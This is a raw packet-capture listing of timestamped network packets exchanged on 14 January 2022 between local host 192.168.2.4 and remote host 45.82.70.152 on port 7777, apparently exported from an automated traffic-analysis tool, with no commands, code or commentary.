                                                                                                                                  Jan 14, 2022 14:10:41.716907978 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.716924906 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.716937065 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.716954947 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.716967106 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.716984034 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.717000008 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.717016935 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.717027903 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.717046022 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.717061043 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.717092037 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.738399029 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.738430023 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.738450050 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.738471031 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.738472939 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.738492012 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.738498926 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.738512993 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.738522053 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.738533974 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.738547087 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.738584042 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.738603115 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.738622904 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.738641024 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.738660097 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.738677979 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.738696098 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.738751888 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.738847971 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.739581108 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.742129087 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.742160082 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.742180109 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.742186069 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.742208004 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.742213011 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.742221117 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.742238998 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.742242098 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.742264032 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.742268085 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.742290974 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.742294073 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.742316961 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.742341995 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.742368937 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.742393017 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.742408991 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.742420912 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.742445946 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.742455006 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.742471933 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.742494106 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.742499113 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.742525101 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.742547035 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.742548943 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.742575884 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.742580891 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.742603064 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.742626905 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.742634058 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.742652893 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.742676973 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.742682934 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.742702007 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.742716074 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.742728949 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.742733955 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.742755890 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.742779970 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.742784023 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.742805958 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.742830992 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.742837906 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.742857933 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.742882013 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.742888927 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.742908955 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.742933989 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.742942095 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.742960930 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.742985010 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.742990017 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.743011951 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.743036985 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.743043900 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.743062019 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.743093014 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.743097067 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.743119001 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.743143082 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.743148088 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.743169069 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.743194103 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.743200064 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.743218899 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.743246078 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.743248940 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.743272066 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.743298054 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.743305922 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.743324995 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.743350983 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.743355036 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.743377924 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.743402958 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.743407011 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.743428946 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.743454933 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.743458033 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.743480921 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.743505955 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.743510008 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.743532896 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.743558884 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.743562937 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.743585110 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.743608952 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.743616104 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.743634939 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.743659973 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.743664026 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.743685961 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.743710995 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.743722916 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.743742943 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.743767023 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.743772030 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.743793964 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.743818998 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.743834972 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.743845940 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.743870974 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.743895054 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.743920088 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.743941069 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.743943930 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.743971109 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.743979931 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.743997097 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.744023085 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.744026899 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.744049072 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.744074106 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.744081020 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.744100094 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.744124889 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.744132042 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.744151115 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.744174957 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.744183064 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.744200945 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.744225979 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.744232893 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.744251966 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.744277000 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.744282961 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.744302034 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.744327068 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.744333982 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.744353056 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.744390011 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.745019913 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.763871908 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.763906002 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.763931036 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.763947010 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.763950109 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.763987064 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.764010906 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.764010906 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.764038086 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.764038086 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.764064074 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.764086962 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.764089108 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.764112949 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.764136076 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.764137030 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.764162064 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.764184952 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.764185905 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.764209986 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.764234066 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.764234066 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.764264107 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.764286995 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.764292002 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.764323950 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.764360905 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.764379025 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.764405012 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.764417887 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.764426947 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.764451981 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.764467001 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.764475107 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.764501095 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.764522076 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.764528990 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.764554977 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.764568090 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.764578104 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.764602900 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.764611959 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.764626980 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.764650106 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.764672041 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.764672995 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.764697075 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.764713049 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.764715910 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.764744043 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.764765978 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.764765978 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.764791012 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.764806032 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.764810085 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.764837980 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.764848948 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.764859915 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.764884949 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.764895916 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.764905930 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.764930964 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.764941931 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.764955044 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.764977932 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.765000105 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.765007973 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.765024900 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.765039921 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.765043974 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.765073061 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.765095949 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.765100956 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.765122890 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.765130997 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.765146971 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.765170097 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.765180111 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.765193939 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.765217066 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.765239954 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.765244961 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.765264988 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.765274048 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.765517950 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.765547991 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.765557051 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.765572071 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.765607119 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.769500971 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.769548893 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.769584894 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.769596100 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.769623041 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.769665956 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.769665956 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.769706964 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.769745111 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.769752026 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.769803047 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.769840002 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.769839048 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.769900084 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.769932985 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.769934893 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.769980907 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.770021915 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.770034075 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.770057917 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.770111084 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.770112038 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.770152092 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.770190001 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.770205021 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.770247936 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.770287991 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.770302057 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.770344973 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.770382881 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.770389080 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.770426989 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.770468950 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.770487070 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.770539045 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.770579100 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.770581007 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.770622969 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.770670891 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.770687103 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.770739079 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.770782948 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.770787001 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.770822048 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.770864964 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.770879984 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.770931959 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.770984888 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.770989895 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.771045923 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.771087885 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.771105051 CET77774977845.82.70.152192.168.2.4
